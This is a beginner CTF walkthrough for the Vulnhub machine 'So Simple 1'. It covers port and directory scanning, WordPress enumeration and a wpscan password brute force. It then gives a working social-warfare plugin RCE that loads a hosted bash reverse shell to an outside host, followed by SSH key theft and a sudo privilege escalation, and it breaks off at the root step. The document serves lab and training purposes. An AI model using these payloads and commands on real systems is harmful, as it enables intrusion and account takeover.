So Simple 1: Vulnhub Walkthrough

So Simple is Easy/Beginners level CTF machine available on Vulnhub create by @roelvb79. There are three flags (2 user and 1 root flag). Which you can download from here.

#nmap

$nmap -p- 192.168.1.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 03:14 EDT
Nmap scan report for so-simple.domain.name (192.168.1.3)
Host is up (0.0027s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

As got port 80 is open start dir fuzzing, use dirb or any other tool.

#dirb

#dirb http://192.168.1.3/
DIRB v2.22
By The Dark Raver
START_TIME: Mon Aug 17 03:23:43 2020
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.3/ ----
http://192.168.1.3/index.html (CODE:200|SIZE:495)
http://192.168.1.3/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://192.168.1.3/wordpress/

Use Wpscan or CMSeek to enumerate wordpress, this time I like to go with CMSeek. CMSeek is written in python help for various CMS testing. You can download it from github https://github.com/Tuhinshubhra/CMSeeK

#cmseek

$python3 cmseek.py -u http://192.168.X.X/wordpress/ 
[+] Deep Scan Results [+]
┏━Target: 192.168.1.3
┠── CMS: WordPress
┃ ├── Version: 5.4.2
┃ ╰── URL: https://wordpress.org
┠──[WordPress Deepscan]
┃ ├── Readme file found: http://192.168.1.3/wordpress//readme.html
┃ ├── License file: http://192.168.1.3/wordpress//license.txt
┃ ├── Plugins Enumerated: 2
┃ │ ├── Plugin: social-warfare
┃ │ │ ├── Version: 3.5.0
┃ │ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/social-warfare
┃ │ ╰── Plugin: simple-cart-solution
┃ │ ├── Version: 5.4.2
┃ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/simple-cart-solution
┃ ├── Themes Enumerated: 1
┃ │ ╰── Theme: twentynineteen
┃ │ ├── Version: 1.6
┃ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/themes/twentynineteen
┃ ├── Usernames harvested: 2
┃ │ ├── admin
┃ │ ╰── max

now let’s try to bruteforce using wpscan with rockyou.txt worslist. user.txt contain username max,admin and for password use rockyou.txt

$wpscan --url http://192.168.1.3/wordpress/ -U user.txt -P rockyou.txt

[+] Performing password attack on Wp Login against 1 user/s
Trying max / opensesame Time: 00:06:57 <=========================================================> (5960 / 5960) 100.00% Time: 00:06:57
[SUCCESS] - max / opensesame
[!] Valid Combinations Found:
| Username: max, Password: opensesame

#exploitation

Check social-wardare plugin and got https://wpvulndb.com/vulnerabilities/9259 which is unautheticated RCE

Create shell.txt file which include line given below and host it on local machine. Example in case of kali start python http server using command python -m SimpleHTTPServer

<pre> system("bash -c 'bash -i >& /dev/tcp/192.168.1.6/4444 0>&1'")</pre>

and now simply visit http://192.168.1.3/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.6:8000/shell.txt

and got shell via nc -lvp 4444

Check for max user folder and got id_rsa file in .ssh directory

copy it, create file id_rsa and change permission, login via ssh. got first user flag.

chmod 600 id_rsa
ssh -i id_rsa [email protected]

#privileges escalation

for steven user

sudo -l
sudo -u steven /usr/sbin/service ../../bin/bash

now let’s try for root, tried sudo -l and seems that particular bash file have privileges but not present so let’s create it.